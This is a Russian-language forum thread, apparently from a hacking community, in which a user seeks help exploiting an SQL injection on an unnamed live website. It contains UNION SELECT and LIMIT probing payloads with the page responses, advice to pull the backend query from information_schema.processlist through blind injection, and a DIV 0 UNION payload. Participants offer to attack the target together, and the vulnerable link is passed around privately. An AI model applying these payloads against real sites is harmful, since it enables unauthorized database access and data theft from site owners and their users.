Вредный скуль

Всем привет! Оставив безуспешные попытки (спасибо администрации за молчание) восстановить свой аккаунт, зарегистрировался снова. Вот, теперь приходится писать в песочнице ) Но вопрос очень актуальный, так что прошу помощи. Есть SQLi, пытался раскрутить классически:
id=1 LIMIT 1 - пустая страница
id=1 LIMIT 2 - пустая страница
id=1 LIMIT 3 - пустая страница
id=1 LIMIT 4 - пустая страница
id=1 LIMIT 5 - пустая страница
id=1 LIMIT 6 - пустая страница
id=1 LIMIT 7 - пустая страница
id=1 LIMIT 8 - отображается одна строка с данными
id=1 LIMIT 9 - две строки с данными
id=1 LIMIT 10 - три строки с данными
и т.д.
Затем я подобрал число столбцов, их оказалось 7.
1 LIMIT 1 UNION SELECT 1,2,3,4,5,6,7 - пустая страница
1 LIMIT 2 UNION SELECT 1,2,3,4,5,6,7 - одна строка с данными
1 LIMIT 3 UNION SELECT 1,2,3,4,5,6,7 - две строки с данными
и т.д.
Вывести данные из других таблиц не получается! И потом, что меня вообще убило:
1 LIMIT 0,10 - три строки с данными
1 LIMIT 1,10 - четыре строки с данными
1 LIMIT 2,10 - пустая страница

 

а зачем LIMIT? запрос как выглядит? скорее всего, у вас там два запроса, которые выполняются одновременно. error-based не пойдет?

 

Вывод ошибок отключен. Я тоже не знаю, какого вида запрос, вот и мучаюсь.

 

как blind крутить можете же. сделайте запрос SELECT info FROM information_schema.processlist и посмотрите

 

Конечно, слепой скуль крутить я могу, задача как раз и состоит в том, чтобы он прозрел ). Спасибо за подсказку, сейчас попробую

 

SELECT `id`, `parent_id`, `href`, `params`, `anchor`, `date_created`, `subtitle` FROM `vw_menu_city_list` WHERE `language_id` = 1
Вот такой классический запрос, ничего интересного я в нем не нашел. Кроме столбцов, которые выводятся в таблице есть еще и другие, в частности `language_id`. С чем связано такое странное поведение?

 

count(info) = 1?
попробуйте id = 1 DIV 0 UNION SELECT 1,2,3,4,5,6,7-- f

 

вернулся пустой результат, в коде страницы тоже пусто

 

там был еще вопрос

 

да

 

скорее всего, переменная попадает еще в условие типа

Code:

if (language_id = 1): echo "................";
else echo ""

поэтому вывод пустой. вариантов я пока что-то не вижу

 

скинь ты уже скуль толпой поковыряем, ну или в пм

 

если бы там еще какое-нибудь условие было, то так бы, к примеру, ничего не отображалось: id=1 LIMIT 1000. Так нет же, выводиться полный список.

 

b3, скунул в личку

 

Только как слепая пока что крутиться

 

Ну а почему мои SQL-конструкции (см. пост #1) таким образом работают? Есть хотя бы какие-то предположения?

 

Вангу нужно звать. Кстати у меня вообще 8 колонок вышло а не 7 как у тебя.

 

да ладно? )

 

ой не, это долго же блиндом будет доставать

 

так он уже достал, #6 пост